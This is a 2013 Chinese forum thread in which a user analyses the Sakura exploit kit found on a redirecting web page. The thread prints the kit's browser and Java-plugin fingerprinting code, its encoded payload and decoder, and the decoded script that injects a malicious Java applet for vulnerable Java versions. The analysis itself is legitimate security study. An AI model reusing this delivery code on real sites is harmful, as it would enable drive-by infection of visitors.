墨酱的 Sakura exploit kit

显示全部楼层 · 发表于 2013-5-3 00:24:05

用chrome打开一直会跳转到 google 。。还以为是失效。。。我弱了
其实这种没理由跳转的一定有问题！
用Redoce 等工具可以看跳转前的源码，不过有1500多行，取出些有特点的。
版本判断：

$.head = doc.getElementsByTagName("head")[0] || doc.getElementsByTagName("body")[0] || doc.body || null;
$.isIE = eval("/*@cc_on!@*/!1");
$.verIE = $.isIE ? ((/MSIE\s*(\d+\.?\d*)/i).test(userAgent) ? parseFloat(RegExp.$1, 10) : 7) : null;
$.verIEfull = null;
$.docModeIE = null;
if ($.isIE) {
var e, verFullFloat, obj = document.createElement("div");
try {
obj.style.behavior = "url(#default#clientcaps)";
$.verIEfull = (obj.getComponentVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}", "componentid")).replace(/,/g, ".")
} catch (e) {}
verFullFloat = parseFloat($.verIEfull || "0", 10);
$.docModeIE = doc.documentMode || ((/back/i).test(doc.compatMode || "") ? 5 : verFullFloat) || $.verIE;
$.verIE = verFullFloat || $.docModeIE
}
$.ActiveXEnabled = false;
if ($.isIE) {
var x, progid = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for (x = 0; x < progid.length; x++) {
if ($.getAXO(progid[x])) {
$.ActiveXEnabled = true;
break
}
}
userAgent = ""
};
$.isGecko = (/Gecko/i).test(product) && (/Gecko\s*\/\s*\d/i).test(userAgent);
$.verGecko = $.isGecko ? $.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(userAgent) ? RegExp.$1 : "0.9") : null;
$.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(userAgent);
$.verChrome = $.isChrome ? $.formatNum(RegExp.$1) : null;
$.isSafari = ((/Apple/i).test(vendor) || (!vendor && !$.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(userAgent);
$.verSafari = $.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(userAgent) ? $.formatNum(RegExp.$1) : null;
$.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(userAgent);
$.verOpera = $.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(userAgent) || 1) ? parseFloat(RegExp.$1, 10) : null;
$.addWinEvent("load", $.handler($.runWLfuncs, $))

复制代码

逻辑漏洞利用:

DTK: {
$: 1,
hasRun: 0,
status: null,
VERSIONS: [],
version: "",
HTML: null,
Plugin2Status: null,
classID: ["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA", "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],
mimeType: ["application/java-deployment-toolkit", "application/npruntime-scriptable-plugin;DeploymentToolkit"],
isDisabled: function () {
var a = this,
b = a.$;
if ((b.isIE && (b.verIE < 6 || !b.ActiveXEnabled)) || (b.isGecko && b.compareNums(b.verGecko, b.formatNum("1.6")) <= 0) || (b.isSafari && b.OS == 1 && (!b.verSafari || b.compareNums(b.verSafari, "5,1,0,0") < 0)) || b.isChrome) {
return 1
}
return 0
},
query: function () {
var l = this,
h = l.$,
f = l.$,
k, m, i, a = h.DOM.altHTML,
g = {}, b, d = null,
j = null,
c = (l.hasRun || l.isDisabled());
l.hasRun = 1;
if (c) {
return l
}
l.status = 0;
if (h.isIE) {
for (m = 0; m < l.classID.length; m++) {
l.HTML = h.DOM.insert("object", ["classid", l.classID[m]], [], a);
d = l.HTML.obj();
if (h.getPROP(d, "jvms")) {
break
}
}
} else {
i = h.hasMimeType(l.mimeType);
if (i && i.type) {
l.HTML = h.DOM.insert("object", ["type", i.type], [], a);
d = l.HTML.obj()
}
} if (d) {
try {
b = h.getPROP(d, "jvms");
if (b) {
j = b.getLength();
if (h.isNum(j)) {
l.status = j > 0 ? 1 : -1;
for (m = 0; m < j; m++) {
i = h.getNum(b.get(j - 1 - m).version);
if (i) {
l.VERSIONS.push(i);
g["a" + h.formatNum(i)] = 1
}
}
}
}
} catch (k) {}
}
i = 0;
for (m in g) {
i++
}
if (i && i !== l.VERSIONS.length) {
l.VERSIONS = []
}
if (l.VERSIONS.length) {
l.version = h.formatNum(l.VERSIONS[0])
};
return l
}

复制代码

跳转部分就是被加密了，简略下是

<html>
<body></body>
<input id='AX' value='%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%3CXh1%60FQ%3E%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5Bko%27l%60Y%26iQihQ.%60Y%60QEh1%60FQ4%29p%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%2151%5B%21i1X%60SY%5BI%5Bko%27l%60Y%26iQihQ.liQ7i1X%60SY4205%2152%29p%5B%5B%5B%5B%5B%5B%5B%5B%5B%21i1X%60SY%5BI%5B%21i1X%60SY.XFo%60Q42%2C2%29p%5B%5B%5B%5B%5B%5B%5B%5B%5B%60B4%21i1X%60SYcms%5BII%5B%2F%5B%3A%3A%5B%21i1X%60SYc3s%5B%3C%5Bm8%29%5B%5B%5B%5B%5B%5Bj%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%28Sh%27niYQ.g1%60Qi4%22%3C5FFoiQ%3E%3CF515n%5BY5niI2vYoFwZ1iB2%5B%215o%27iI2S%7E%60%27.vYoF2%3B%3E%3CF515n%5BY5niI2vYoFwin%7Ei%28%28i%282%5B%215o%27iI2k%26T%2A%7EWgl%28n7_hMo%21%7Evu%60dE%2AgL%60Ao%7EnN%21e%3Do%27e-u%60%28GRnt6l%60k-%2A85nzXh%23A-h%3D7vkEL9tvC%60L%23AShn7nkE06tnF%27%7E%40C%60kv9F%7Ene%21hnmZ%28%3Do%21%7Ev%2A8%28%3Dou%7E%3D%7D%2B7nmok%23Tu5GRXe6%2A8%28n7%27e%3DT_koNZh%3D%7D8t3eo%7EnR%21hv%2A8%7EMen%7E%3Do%27eEmZ%7E%3D9%21%28M7%7Ct-%2A8tMo%27enT_%7EW%5Du5WT%27kv9_eGN%21%28G0veGd%2Bk%3DS_hM%7Dl%28n7_hMo%21%7Evu%60dE%2A3 _Ll5%400oevu%605%40Ruh%26S%21tMFZ%28nb%27h37%27tnN%21%7EETghnT%7C%28WNuh_TZ%28GR%21e%3Dg%215v0-eELlt-%2A85n%5D_L%3DZ_eWUTLnmFeMZuG30%21%28Wz%7CtYASh%23Ll%7EW%5DF%7Evu%60%28%400meELlt-%2A8t30ohMTmhnNoh-%2A8UGAg%7E%3D7utWRohMdlL%3DmZ5W%2AQUM9Zh3dTL%7CmZ5W%2A%27UM9Zh3d%60L%3DzZ%7EW%7DTL%7CmZ5W%2A%60L%40%28Fe%40RSkEL9d%60Ll5%3D7FeMZukEL9Lv%2A8h%3D%5D_UWul%7En%5DQe6u%60GmTZh%40AXeGRBh3NMG3eZ%7E%3Do%7CUGRoe%23Ll%28n%5DX%28W%7DTLYR_%28W%7D%60kvg%21h%3D%5D_UWu%2Bk%23TZh%40AXeGJQe%3D7-U-%2A8%28GA%7CUGRoL%3DNSeWN1kE0%60UWN1e30%21%28Wz%7CL%608%2Bk%23TV%7En9gklII2%5B%3B%3E%3CF515n%5BY5niI2F515n2%5B%215o%27iI29%28%28_-YYx%3FZnZg_%2Ali%2F%7Cvl%7C%3Fh%27l%28l%7CZ%7B%2FSxg%2F%27Z-QQY_%2AZ%3FYIM%21Mg9%28T2%3E%3C%3BF515n%3E%3C%3B5FFoiQ%3E%22%29p%5B%5B%5B%5B%5B%5Bq%5B%5B%5B%5B%5B%5BioXi%5B%60B4%21i1X%60SYcms%5B%3C%5B%2F%29%5B%5B%5B%5B%5B%5B%5B%5B%5B%5B%28Sh%27niYQ.g1%60Qi4%22%3C5FFoiQ%5BhS%28iI2d5%60Y.ho5XX2%5B51hZ%60%21iI2n%60lZQw1S%27Y%28.FZF2%5Bg%60%28QZI2%2F82%5BZi%60lZQI23T2%3E%3CF515n%5BY5niI2F515n2%5B%215o%27iI29%28%28_-YYx%3FZnZg_%2Ali%2F%7Cvl%7C%3Fh%27l%28l%7CZ%7B%2FSxg%2F%27Z-QQY_%2AZ%3FYIM%21Mg9%28T2%3E%3C%3B5FFoiQ%3E%22%29p%5B%5B%5B%5B%5B%5B%3C%3BXh1%60FQ%3E%5B%5B'>Samsung Galaxy S4</input>
<script>
iin = document.getElementById('AX').value;
.................
.................
function tayr(pk) {
q = '';
p = "K [chZei`a5z-{jv!Pk|r1mnYU}qV7/;pF]sXG=ILtQJ0u'2Md(4*OD&:x9T6H@fBAC#y_wgloSEb~";
for (i = 0; i < pk.length; i++) {
o = pk.charAt(i);
m = p.indexOf(o);
if (m > -1) {
if (m == 0)
m = 77;
q += p.charAt(m - 1);
} else
q += o;
}
return q;
}
document.write(tayr(unescape(iin)));
</script>

复制代码

解密后是：

<script>
PluginDetect.initScript();
var version = PluginDetect.getVersion('Java');
version = version.split(',');
if (version[1] == 7 && version[3] < 18) {
document.write("<applet><param name='jnlp_href' value='obiu.jnlp'/><param name='jnlp_embedded' value='PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48am5scCBzcGVjPSIxLjAiICBocmVmPSJTLmpubHAiPjxpbmZvcm1hdGlvbj48dGl0bGU+Vm1lPC90aXRsZT48dmVuZG9yPlNhcGU8L3ZlbmRvcj48b2ZmbGluZS1hbGxvd2VkLz48L2luZm9ybWF0aW9uPjxyZXNvdXJjZXM+PGoyc2UgdmVyc2lvbj0iMS43KyIgaHJlZj0iaHR0cDovL2phdmEuc3VuLmNvbS9wcm9kdWN0cy9hdXRvZGwvajJzZSIgLz48amFyIGhyZWY9Im1pZ2h0X3JvdW5kLnBocCIgbWFpbj0idHJ1ZSIgLz48L3Jlc291cmNlcz48YXBwbGV0LWRlc2MgIG1haW4tY2xhc3M9Ik1haW4uY2xhc3MiIG5hbWU9Ik1haW4iIHdpZHRoPSIxMiIgaGVpZ2h0PSIxIj48cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiPjwvcGFyYW0+PC9hcHBsZXQtZGVzYz48dXBkYXRlIGNoZWNrPSJiYWNrZ3JvdW5kIi8+PC9qbmxwPg==' /><param name='param' value='xddyznn:?hmhwy4ge7kjgk?cugdgkh-7o:w7uhzttny4h?n=2v2wxd9'></param></applet>");
}
else if (version[1] < 7) document.write("<applet code='Main.class' archive='might_round.php' width='78' height='39'><param name='param' value='xddyznn:?hmhwy4ge7kjgk?cugdgkh-7o:w7uhzttny4h?n=2v2wxd9'></applet>");
</script>

复制代码

版本不相符的话就执行跳转咯~

显示全部楼层 · 发表于 2013-5-3 01:01:11

我低调路过……看不懂什么的最讨厌了……等阿狸，还有，拉你入hunter至少目前来说是我最正确的决定~

显示全部楼层 · 发表于 2013-5-3 12:09:42

蓝核发表于 2013-5-3 01:01
我低调路过……看不懂什么的最讨厌了……等阿狸，还有，拉你入hunter至少目前来说是我最正确的决定~

var version = PluginDetect.getVersion('Java');
version = version.split(',');
if (version[1] == 7 && version[3] < 18)

复制代码

骄傲的使用Chrome

Powered By Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31

显示全部楼层 · 发表于 2013-5-3 12:11:13

m220011 发表于 2013-5-3 12:09

骄傲的使用Chrome

Powered By Mozilla/5.0 (Windows NT 6.1; WOW64) Apple ...

我不懂。。。

显示全部楼层 · 发表于 2013-5-3 12:40:24

蓝核发表于 2013-5-3 12:11
我不懂。。。

你是一点编程基础都没有啊那个是判断java的版本的

Sakura exploit kit

8[0-9]\/forum\/

复制代码

骄傲的使用Chrome

Powered By Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31

显示全部楼层 · 发表于 2013-5-3 13:12:48

m220011 发表于 2013-5-3 12:40
你是一点编程基础都没有啊那个是判断java的版本的

Sakura exploit kit

嗯……我们学校学的是VB……考完试就还给老师了……

显示全部楼层 · 发表于 2013-5-3 15:10:46

好几天没结算工钱了，工头就知道泡白富美吗？

[原创] 墨酱的 Sakura exploit kit

评分